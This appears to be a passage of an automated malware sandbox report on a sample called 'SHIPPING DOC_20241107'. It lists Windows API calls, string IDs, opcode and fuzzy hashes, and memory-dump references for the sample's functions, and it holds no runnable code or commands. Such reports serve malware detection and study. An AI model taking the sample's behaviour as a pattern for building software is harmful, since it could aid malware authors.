                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: Combobox
                                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                                              • Opcode ID: afeff9d58108da6b3c2cb388777e08fae7c868d3708dc7519e6870f5a2059dd3
                                                                                                                              • Instruction ID: 6192d57e2fbe9f60b3cd8ba89c9582a79303820d4edd166265d963be7a547466
                                                                                                                              • Opcode Fuzzy Hash: afeff9d58108da6b3c2cb388777e08fae7c868d3708dc7519e6870f5a2059dd3
                                                                                                                              • Instruction Fuzzy Hash: 3E11C4757102087FEF21CF64DC81EFB376AEB883A8F508128F91897290E6319C6187A0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B1D35: CreateWindowExW.USER32 ref: 009B1D73
                                                                                                                                • Part of subcall function 009B1D35: GetStockObject.GDI32(00000011), ref: 009B1D87
                                                                                                                                • Part of subcall function 009B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 009B1D91
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A36CA3
                                                                                                                              • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00A36CBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                              • String ID: static
                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                              • Opcode ID: 5e3f3fd331c88b756165ef302a90ae40780d3a4d0a04c5343de3275b966522fb
                                                                                                                              • Instruction ID: e09bdee0dffea6ca791bdb01ee41debc6d18047660b16748397de5df6519ba22
                                                                                                                              • Opcode Fuzzy Hash: 5e3f3fd331c88b756165ef302a90ae40780d3a4d0a04c5343de3275b966522fb
                                                                                                                              • Instruction Fuzzy Hash: B121297292020AAFDB04DFA8DD45AFABBB8FB08314F009629F955D3250D735E861DB60
                                                                                                                              APIs
                                                                                                                              • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00A369D4
                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A369E3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                                              • String ID: edit
                                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                                              • Opcode ID: 8551b8a6a666ff1fc373af8bfbf4fc899bc773705fdf7cbeeb4862a154795581
                                                                                                                              • Instruction ID: 4170477c7559741942dd0f42d97168f978d09acb1c4e76f9ec32ea12a2f583bb
                                                                                                                              • Opcode Fuzzy Hash: 8551b8a6a666ff1fc373af8bfbf4fc899bc773705fdf7cbeeb4862a154795581
                                                                                                                              • Instruction Fuzzy Hash: 7E115871510204BBEB108F64DD45BEA3AA9EB49368F608724FAA4961E0C7719C919B60
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                              • Opcode ID: d9c725797f002b512ef90e328923e84160c76b3f6c9b87fe36d2ea3e788ca207
                                                                                                                              • Instruction ID: fa5d182576144fbb0761987c4b5ab4a90b13d10fad7d0b6db20c244bc99dd19f
                                                                                                                              • Opcode Fuzzy Hash: d9c725797f002b512ef90e328923e84160c76b3f6c9b87fe36d2ea3e788ca207
                                                                                                                              • Instruction Fuzzy Hash: 74110431D01224ABCB20DBACEC84BDD77B9AB15340F144121ED15AB2A0E770EE96C7D1
                                                                                                                              APIs
                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A22342
                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A2236B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                              • String ID: <local>
                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                              • Opcode ID: 7e9f14b3508721bf76ff7af5e57c338cc6629656218e7decbb2783c50a76f35c
                                                                                                                              • Instruction ID: c7dcd915cf6c070ee714bdf55c81258a336cd3b1a7afb5abee09187a91ab1aeb
                                                                                                                              • Opcode Fuzzy Hash: 7e9f14b3508721bf76ff7af5e57c338cc6629656218e7decbb2783c50a76f35c
                                                                                                                              • Instruction Fuzzy Hash: FA11CA70501235BADB24CF5AAC89FFAFBA8EB06351F10823AF9455A000E2786981C7F0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A0AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00A0AEC7
                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A09135
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 372448540-1403004172
                                                                                                                              • Opcode ID: 79ac35329001b5be6483f8a75503a2baed7ad276a30a89cbc3f92eeb8b7f74d4
                                                                                                                              • Instruction ID: 7f4c00d1d24c173b785419f5bfc6d9fe02a3b5dd9b8e5bf94c59fe62a82c101a
                                                                                                                              • Opcode Fuzzy Hash: 79ac35329001b5be6483f8a75503a2baed7ad276a30a89cbc3f92eeb8b7f74d4
                                                                                                                              • Instruction Fuzzy Hash: 3C012431A45219ABCB04FFA4CC969FE7379FF96320B100B59F832672C2DB356C088610
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __fread_nolock_memmove
                                                                                                                              • String ID: EA06
                                                                                                                              • API String ID: 1988441806-3962188686
                                                                                                                              • Opcode ID: 0c1499de3a01ab3b3fc280d313433d61366782e50ab81d5d6ff7fddaf122e324
                                                                                                                              • Instruction ID: 8441f746890ae694056b783a89dd62a033f412746af717762443685dd3b3210c
                                                                                                                              • Opcode Fuzzy Hash: 0c1499de3a01ab3b3fc280d313433d61366782e50ab81d5d6ff7fddaf122e324
                                                                                                                              • Instruction Fuzzy Hash: 2401B9719442587EDB28C7A8C856FEE7BF8DB15701F00459BF552D2281E9B9E6048760
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A0AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00A0AEC7
                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A0902D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 372448540-1403004172
                                                                                                                              • Opcode ID: 46a40305b44c1c0b519930aebf261ef8bc88b3ad0277f699eb1d1e1e2443b9b3
                                                                                                                              • Instruction ID: 536a1c0fc6c084dbd8896c0ddea87e8097170b5adb98033bab156ebb3f7b7063
                                                                                                                              • Opcode Fuzzy Hash: 46a40305b44c1c0b519930aebf261ef8bc88b3ad0277f699eb1d1e1e2443b9b3
                                                                                                                              • Instruction Fuzzy Hash: 0201F271A41208ABCB14EBA0DE92EFFB3ACDF55350F140119B802632C2DE256F089271
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A0AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00A0AEC7
                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A090B0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 372448540-1403004172
                                                                                                                              • Opcode ID: f8f6256887aea2a9e589400505d1a29d3a4c42188fd4d77877b511c6ba758b0a
                                                                                                                              • Instruction ID: 76648a37df693bf6145c46c32d17cba43315f65e16f52a05f1e8cbcd9e12ae30
                                                                                                                              • Opcode Fuzzy Hash: f8f6256887aea2a9e589400505d1a29d3a4c42188fd4d77877b511c6ba758b0a
                                                                                                                              • Instruction Fuzzy Hash: B701D671A452187BCB00FBA4DE82FFFB3AC9F55350F140119B802732C2DA255E089272
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassName_wcscmp
                                                                                                                              • String ID: #32770
                                                                                                                              • API String ID: 2292705959-463685578
                                                                                                                              • Opcode ID: fefe188c16c42838c880d254eb9f8b0a1ccbecaa7d6fc77b41cb4f3d501defba
                                                                                                                              • Instruction ID: 1907af0ca32320b9a8fd46ec855b98b3b27be144aaacdd2d388c11268531a78d
                                                                                                                              • Opcode Fuzzy Hash: fefe188c16c42838c880d254eb9f8b0a1ccbecaa7d6fc77b41cb4f3d501defba
                                                                                                                              • Instruction Fuzzy Hash: B1E0D872A002296BD720DBE9AC4AFA7FBACEB85771F000167FD04D3151E960DA4687E5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009EB494: _memset.LIBCMT ref: 009EB4A1
                                                                                                                                • Part of subcall function 009D0AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009EB470,?,?,?,009B100A), ref: 009D0AC5
                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,009B100A), ref: 009EB474
                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009B100A), ref: 009EB483
                                                                                                                              Strings
                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009EB47E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                              • API String ID: 3158253471-631824599
                                                                                                                              • Opcode ID: b7380264f5ef56f828ec2ce910beb506e7afc5441d50cd9a4fc4bac129edc78a
                                                                                                                              • Instruction ID: 9cf35b878212f2b0955384c3cc8ba90b4f0c08ff86d3c2f4a03b2c0448dcef47
                                                                                                                              • Opcode Fuzzy Hash: b7380264f5ef56f828ec2ce910beb506e7afc5441d50cd9a4fc4bac129edc78a
                                                                                                                              • Instruction Fuzzy Hash: CEE039746007518ED321DF66D9057877AE4AB40704F01892DF886C66A2E7B4D849CBA1
                                                                                                                              APIs
                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00A199A1
                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A199B8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                              • String ID: aut
                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                              • Opcode ID: eb290e1eb0b21efe74249b72bfed2974c2022c8ff142f0223e36a95737b8f73f
                                                                                                                              • Instruction ID: ba3fef5d56d9f563cda6d144ef64dca5f96c5003745511d0b044e53305baa44c
                                                                                                                              • Opcode Fuzzy Hash: eb290e1eb0b21efe74249b72bfed2974c2022c8ff142f0223e36a95737b8f73f
                                                                                                                              • Instruction Fuzzy Hash: B5D05E7994030DBFDB60DBE0DC0EFDBB73CE704700F0006B1BA54920A1EAB095998B91
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32 ref: 00A359D7
                                                                                                                              • PostMessageW.USER32 ref: 00A359EA
                                                                                                                                • Part of subcall function 00A152EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A15363
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 81cc51ac2b05ba25e12204655e6132dac26bf8554346b1a2c08b7d74bf08405f
                                                                                                                              • Instruction ID: 6c972cfd9dc09716641adc4431f910164b3ce1ee4a5ee2d61157bb5049120561
                                                                                                                              • Opcode Fuzzy Hash: 81cc51ac2b05ba25e12204655e6132dac26bf8554346b1a2c08b7d74bf08405f
                                                                                                                              • Instruction Fuzzy Hash: C4D0C932B94711BAE664ABB09C0BFD76A28BB50B50F000925B256AA1E0C9E4A8418664
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32 ref: 00A35A17
                                                                                                                              • PostMessageW.USER32 ref: 00A35A1E
                                                                                                                                • Part of subcall function 00A152EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A15363
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 79c65020b87430551ae4e1191a533811e8f5eaeee10a0fd5ac17d0bc20cd2699
                                                                                                                              • Instruction ID: 7753a3c9eaf58accce4955d4a127a97005104eba9c9468dd3f669f86c1af1a35
                                                                                                                              • Opcode Fuzzy Hash: 79c65020b87430551ae4e1191a533811e8f5eaeee10a0fd5ac17d0bc20cd2699
                                                                                                                              • Instruction Fuzzy Hash: 30D0C932B90711BAE664ABB09C0BFD76628BB54B50F000925B256EA1E0C9E4A8418664